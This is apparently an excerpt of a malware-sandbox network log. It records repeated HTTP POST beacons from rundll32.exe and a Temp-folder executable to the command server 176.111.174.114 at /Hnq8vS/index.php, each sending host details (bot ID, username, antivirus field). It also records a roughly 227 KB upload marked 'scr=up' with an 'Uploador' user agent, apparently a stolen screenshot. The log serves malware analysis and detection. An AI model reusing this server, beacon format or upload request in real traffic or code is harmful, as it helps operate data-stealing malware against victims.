                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
420 | 192.168.2.4 | 50001 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:17.577191114 CEST | 11625 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
421 | 176.111.174.114 | 80 | 192.168.2.4 | 50001 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:17.677256107 CEST | 11625 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:17 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
422 | 192.168.2.4 | 50002 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:17.881489038 CEST | 11626 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
423 | 176.111.174.114 | 80 | 192.168.2.4 | 50002 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:17.984365940 CEST | 11626 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:17 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
424 | 192.168.2.4 | 50003 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:18.198049068 CEST | 11627 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
425 | 176.111.174.114 | 80 | 192.168.2.4 | 50003 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:18.302170992 CEST | 11627 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:18 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
426 | 192.168.2.4 | 50005 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:18.509008884 CEST | 11628 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
427 | 176.111.174.114 | 80 | 192.168.2.4 | 50005 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:18.610826969 CEST | 11628 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:18 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
428 | 192.168.2.4 | 50006 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:18.819572926 CEST | 11629 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
429 | 176.111.174.114 | 80 | 192.168.2.4 | 50006 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:18.924428940 CEST | 11629 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:18 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
43 | 176.111.174.114 | 80 | 192.168.2.4 | 49769 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:17.388114929 CEST | 4542 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:17 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
430 | 192.168.2.4 | 50007 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:19.128921032 CEST | 11630 | OUT | POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
431 | 176.111.174.114 | 80 | 192.168.2.4 | 50007 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:19.228918076 CEST | 11630 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:19 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
432 | 192.168.2.4 | 50008 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:19.447221041 CEST | 11631 | OUT | POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
433 | 176.111.174.114 | 80 | 192.168.2.4 | 50008 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:19.550362110 CEST | 11631 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:19 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
434 | 192.168.2.4 | 50009 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:19.671717882 CEST | 11645 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
Host: 176.111.174.114
User-Agent: Uploador
Content-Type: multipart/form-data; boundary=152138533219.jpg
Connection: Keep-Alive
Content-Length: 227248


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
435 | 192.168.2.4 | 50010 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:19.796681881 CEST | 11672 | OUT | POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
436 | 176.111.174.114 | 80 | 192.168.2.4 | 50010 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:19.905201912 CEST | 11726 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:19 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
437 | 192.168.2.4 | 50011 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:20.119419098 CEST | 11860 | OUT | POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
438 | 176.111.174.114 | 80 | 192.168.2.4 | 50009 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:20.164510965 CEST | 11861 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:19 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          439 | 176.111.174.114 | 80 | 192.168.2.4 | 50011 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:20.225033045 CEST | 11862 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:20 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          44 | 192.168.2.4 | 49770 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:17.598478079 CEST | 4543 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          440 | 192.168.2.4 | 50012 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:20.430602074 CEST | 11862 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          441 | 176.111.174.114 | 80 | 192.168.2.4 | 50012 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:20.532105923 CEST | 11863 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:20 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          442 | 192.168.2.4 | 50014 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:20.736064911 CEST | 11863 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          443 | 176.111.174.114 | 80 | 192.168.2.4 | 50014 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:20.836692095 CEST | 11864 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:20 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          444 | 192.168.2.4 | 50015 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:21.052602053 CEST | 11865 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          445 | 176.111.174.114 | 80 | 192.168.2.4 | 50015 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:21.149344921 CEST | 11870 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:21 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          446 | 192.168.2.4 | 50017 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:21.367979050 CEST | 11874 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          447 | 176.111.174.114 | 80 | 192.168.2.4 | 50017 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:21.468781948 CEST | 11875 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:21 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          448 | 192.168.2.4 | 50019 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:21.674333096 CEST | 11875 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          449 | 176.111.174.114 | 80 | 192.168.2.4 | 50019 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:21.773132086 CEST | 11876 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:21 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          45 | 176.111.174.114 | 80 | 192.168.2.4 | 49770 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:17.705573082 CEST | 4543 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:17 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
